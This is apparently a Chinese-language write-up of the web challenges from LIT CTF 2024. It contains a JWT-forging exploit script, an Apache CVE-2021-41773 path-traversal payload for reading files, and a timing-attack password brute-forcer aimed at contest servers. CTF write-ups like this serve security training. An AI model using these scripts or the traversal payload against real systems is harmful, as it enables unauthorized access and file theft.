【Web】LIT CTF 2024 题解(全)

目录

anti-inspect

jwt-1

jwt-2

traversed

kirbytime

scrainbow

---

anti-inspect

因为一直while true，网页会卡死无法访问

const flag = "LITCTF{your_%cfOund_teh_fI@g_94932}";
      console.log(
          flag,
          "background-color: darkblue; color: white; font-style: italic; border: 5px solid hotpink; font-size: 2em;"
        );

直接console里打印出flag，注意谷歌浏览器不行，这里我用的是火狐

jwt-1

注册改jwt

爆密钥

改jwt拿flag

jwt-2

直接给了源码，泄露了密钥

附件是ts写的，破解脚本也拿ts写就是

exp:

const crypto = require('crypto');
const axios = require('axios');

const url = 'http://litctf.org:31777/flag';
const jwtSecret = 'xook';

// JWT header
const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' }), 'utf8')
    .toString('base64')
    .replace(/=/g, '');

// 伪造的JWT payload
const payload = Buffer.from(JSON.stringify({ name: 'aad', admin: true }), 'utf8')
    .toString('base64')
    .replace(/=/g, '');

// 生成伪造的JWT签名
const data = `${header}.${payload}`;
const signature = crypto.createHmac('sha256', jwtSecret)
    .update(data)
    .digest('base64')
    .replace(/=/g, '');

// 生成伪造的JWT token
const forgedToken = `${data}.${signature}`;

// 设置cookie并发送请求
axios.get(url, { headers: { Cookie: `token=${forgedToken}` } })
    .then(response => {
        console.log(response.data);
    })
    .catch(error => {
        if (error.response) {
            console.error(error.response.data);
        } else {
            console.error(error.message);
        }
    });

traversed

dirsearch扫出来信息泄露

打的是CVE-2021-41773任意文件读取Apache HTTP Server路径穿越漏洞（CVE-2021-41773、CVE-2021-42013）复现 | chaser's Blog

读当前目录下flag.txt即可

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/cwd/flag.txt

或者先读环境变量/proc/1/environ得知pwd为/app

再读/app/flag.txt

kirbytime

写脚本暴力破解密码

py脚本

import requests
import string
import time

# 目标 URL
url = 'http://34.31.154.223:50350/'  # 修改为实际的 URL

# 扩展字符集（包括小写字母、大写字母、数字和常见特殊符号）
charset = string.ascii_letters + string.digits + "!@#$%^&*()-=_+[]{}|;:,.<>/?~"

# 密码长度
password_length = 7

# 初始猜测密码
known_password = ['a'] * password_length  # 初始密码设为 'aaaaaaa'

def check_password(password):
    """检查密码并返回响应时间"""
    start_time = time.time()
    response = requests.post(url, data={'password': password})
    end_time = time.time()
    response_time = end_time - start_time
    print(f"Trying password: {password}, Response Time: {response_time:.2f}s")
    return response_time

def find_password():
    for pos in range(password_length):
        print(f"Finding character for position {pos}...")
        for char in charset:
            # 尝试将当前位置设置为当前字符
            known_password[pos] = char
            current_guess = ''.join(known_password)
            response_time = check_password(current_guess)
            
            # 动态计算阈值，根据字符位置动态设置
            threshold = 1.2 + pos * 1.0  # 例：阈值动态增加，可根据实际情况调整
            print(f"Response Time for {char} at position {pos}: {response_time:.2f}s, Threshold: {threshold:.2f}s")

            if response_time > threshold:
                print(f"Character at position {pos} fixed as: {char}")
                break
        else:
            # 如果没有找到合适的字符，重置当前位置并尝试其他字符
            known_password[pos] = 'a'
            print(f"Failed to fix character at position {pos}")

        print(f"Known password so far: {''.join(known_password)}")

    return ''.join(known_password)

# 开始破解
if __name__ == '__main__':
    start_time = time.time()
    found_password = find_password()
    end_time = time.time()
    elapsed_time = end_time - start_time
    if found_password:
        print(f"Final password: {found_password}")
        print(f"Time taken: {elapsed_time:.2f} seconds")
        
        # 使用找到的密码进行登录
        response = requests.post(url, data={'password': found_password})
        if response.status_code == 200:
            print("Login successful!")
            print("Response from server:")
            print(response.text)
        else:
            print("Login failed.")
    else:
        print("Password not found.")

爆出来密码是kBySlaY

直接LITCTF{}包裹密码就是flag

scrainbow

纯脚本题，写脚本通了游戏即可

import requests

headers = {
    'Accept': '*/*',
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
    'Connection': 'keep-alive',
    'Referer': 'http://litctf.org:31780/',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0'
}

data = requests.get('http://litctf.org:31780/data', headers=headers, verify=False).json()


def rgb2hsl(hex: str) -> tuple[float, float, float]:
    hex = hex.lstrip('#')
    r, g, b = int(hex[:2], 16), int(hex[2:4], 16), int(hex[4:], 16)
    r, g, b = r / 255.0, g / 255.0, b / 255.0
    mx = max(r, g, b)
    mn = min(r, g, b)
    df = mx-mn
    if mx == mn:
        h = 0
    elif mx == r:
        h = (60 * ((g-b)/df) + 360) % 360
    elif mx == g:
        h = (60 * ((b-r)/df) + 120) % 360
    elif mx == b:
        h = (60 * ((r-g)/df) + 240) % 360
    if mx == 0:
        s = 0
    else:
        s = df/mx
    l = (mx+mn)/2
    return h, s, l


colors_map: dict[float, list[int]] = {}
for i, color in enumerate(data):
    h, s, l = rgb2hsl(color)
    if h not in colors_map:
        colors_map[h] = []
    colors_map[h].append(i)

colors = [p for h, p in sorted(colors_map.items(), key=lambda x: x[0], reverse=False)]

target = []
for i in range(100):
    for j in range(100):
        target.append(colors[i+j].pop())

# for i in range(len(data)):
#     print(f"data[{i}] = '{data[target[i]]}';")

# exit()

moves = []
current = [i for i in range(len(data))]

for i in range(len(target)):
    if current[i] == target[i]:
        continue
    a, b = i, current.index(target[i])
    moves.append((a, b))
    current[a], current[b] = current[b], current[a]

# for move in moves:
    # print(f"temp = data[{move[0]}]; data[{move[0]}] = data[{move[1]}]; data[{move[1]}] = temp;")

response = requests.post('http://litctf.org:31780/test', headers=headers, json={'data': moves}, verify=False)

print(response.text)